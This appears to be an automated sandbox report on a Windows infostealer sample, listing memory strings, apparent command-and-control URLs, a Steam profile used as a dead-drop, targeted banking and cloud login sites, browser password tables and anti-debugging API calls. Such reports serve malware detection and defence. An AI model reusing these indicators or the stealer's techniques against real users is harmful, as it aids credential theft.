Source: Gj8P0mbklo.exe, 00000000.00000003.2151751922.000000000509F000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2151712465.0000000005090000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dervinko.biz/Up/bAW
Source: Gj8P0mbklo.exe, 00000000.00000003.2108951092.00000000050CE000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dervinko.biz/Up/bLocal
Source: Gj8P0mbklo.exe, 00000000.00000003.2151826752.000000000507F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dervinko.biz/Up/b_
Source: Gj8P0mbklo.exe, 00000000.00000003.2151712465.00000000050CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dervinko.biz/Up/bistAndAuditAlarmByHandle
Source: Gj8P0mbklo.exe, 00000000.00000003.2145426350.00000000050CE000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2145176778.00000000050CA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dervinko.biz/Up/bistAndAuditAlarmByHandleerta
Source: Gj8P0mbklo.exe, 00000000.00000003.2151751922.000000000509F000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2151712465.0000000005090000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dervinko.biz/Up/byDllc
Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002794000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dervinko.biz/nd-point:b
Source: Gj8P0mbklo.exe, 00000000.00000002.2152864496.000000000507F000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2151826752.000000000507F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dervinko.biz/q
Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.000000000274E000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000002.2152455570.00000000027B1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dervinko.biz/ujs/89737b57-777d-400d-bb7f-77b7e024920e
Source: Gj8P0mbklo.exe, 00000000.00000003.2108844417.0000000005138000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Gj8P0mbklo.exe, 00000000.00000003.2108844417.0000000005138000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Gj8P0mbklo.exe, 00000000.00000003.2108844417.0000000005138000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://help.steampowered.com/
Source: Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | String found in binary or memory: https://help.steampowered.com/en/
Source: Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.steampowered.com/
Source: Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lv.queniujq.cn
Source: Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://medal.tv
Source: Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://player.vimeo.com
Source: Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://recaptcha.net
Source: Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://s.ytimg.com;
Source: Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sketchfab.com
Source: Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steam.tv/
Source: Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steambroadcast.akamaized.net
Source: Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: 76561199609719039[1].htm.0.dr | String found in binary or memory: https://steamcommunity.com/
Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002794000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/-
Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | String found in binary or memory: https://steamcommunity.com/discussions/
Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 76561199609719039[1].htm.0.dr | String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199609719039
Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | String found in binary or memory: https://steamcommunity.com/market/
Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: Gj8P0mbklo.exe | String found in binary or memory: https://steamcommunity.com/profiles/76561199609719039
Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002794000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199609719039(
Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | String found in binary or memory: https://steamcommunity.com/profiles/76561199609719039/badges
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: https://steamcommunity.com/profiles/76561199609719039/inventory/
        Source: Gj8P0mbklo.exeString found in binary or memory: https://steamcommunity.com/profiles/76561199609719039/ujs/strwvfncostrbrCHbrGk
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002794000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199609719039B
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: https://steamcommunity.com/workshop/
        Source: 76561199609719039[1].htm.0.drString found in binary or memory: https://store.steampowered.com/
        Source: Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
        Source: 76561199609719039[1].htm.0.drString found in binary or memory: https://store.steampowered.com/about/
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: https://store.steampowered.com/explore/
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: https://store.steampowered.com/legal/
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: https://store.steampowered.com/mobile
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: https://store.steampowered.com/news/
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: https://store.steampowered.com/points/shop/
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: https://store.steampowered.com/stats/
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
        Source: Gj8P0mbklo.exe, 00000000.00000003.2108844417.0000000005138000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
        Source: Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
        Source: Gj8P0mbklo.exe, 00000000.00000003.2108844417.0000000005138000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
        Source: Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
        Source: Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
        Source: Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
        Source: Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
        Source: Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
        Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
        Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
        Source: unknownHTTPS traffic detected: 23.61.62.148:443 -> 192.168.2.6:49699 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.13.203:443 -> 192.168.2.6:49700 version: TLS 1.2
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Code function: 0_2_00373C10 NtCreateFile,GetProcessHeap,RtlAllocateHeap,NtReadFile
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Code function: 0_2_0036BCD0 NtQuerySystemInformation
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Code function: 0_2_0036BE50 NtQuerySystemInformation
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Code function: String function: 00375550 appears 42 times
Source: Gj8P0mbklo.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP
Source: classification engine Classification label: mal84.troj.spyw.winEXE@1/2@2/2
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Code function: 0_2_003741E0 CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle,Sleep
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\76561199609719039[1].htm
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Command line argument: .I9 0_2_00394880
Source: Gj8P0mbklo.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Gj8P0mbklo.exe, 00000000.00000003.2127679527.0000000005125000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2108951092.00000000050BD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Gj8P0mbklo.exe ReversingLabs: Detection: 57%
Source: Gj8P0mbklo.exe Virustotal: Detection: 61%
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Section loaded: dxgi.dll
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: Gj8P0mbklo.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Gj8P0mbklo.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Code function: 0_2_00365C3B push 8B003961h; iretd 0_2_00365C40
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Code function: 0_2_00394785 push ecx; ret 0_2_00394798
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Code function: 0_2_003701C0 FindFirstFileA,PathMatchSpecA
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Code function: 0_2_0035CE40 FindFirstFileA,FindNextFileA,Sleep
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Code function: 0_2_00389AFB FindFirstFileExW
Source: Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696487552f
Source: Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.000000000274E000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000002.2152455570.00000000027B1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050DA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696487552p
Source: Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696487552
Source: Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696487552o
Source: Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696487552
Source: Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696487552j
Source: Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696487552s
Source: Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.00000000027B1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWL
Source: Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Code function: 0_2_00375363 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Code function: 0_2_00374780 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Code function: 0_2_00370940 SHGetFolderPathA,SHGetFolderPathA,GetProcessHeap,HeapFree,Sleep
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Code function: 0_2_00374A1F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Code function: 0_2_003754D5 SetUnhandledExceptionFilter
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Code function: 0_2_00380DCC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Code function: 0_2_0037517F cpuid
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Code function: EnumSystemLocalesW 0_2_0038D00D
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW 0_2_0038D0A0
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Code function: EnumSystemLocalesW 0_2_0038694D
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Code function: GetLocaleInfoW 0_2_0038D300
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP 0_2_0038D429
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Code function: GetACP,IsValidCodePage,GetLocaleInfoW 0_2_0038CC79
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Code function: GetLocaleInfoW 0_2_0038D52F
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW 0_2_0038D605
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Code function: GetLocaleInfoW 0_2_00386E79
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Code function: EnumSystemLocalesW 0_2_0038CF27
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Code function: EnumSystemLocalesW 0_2_0038CF72
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Code function: 0_2_00376125 GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,GetSystemTimeAsFileTime
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe Code function: 0_2_00387A30 GetTimeZoneInformation

        Stealing of Sensitive Information

Source: Yara match File source: Process Memory Space: Gj8P0mbklo.exe PID: 6256, type: MEMORYSTR
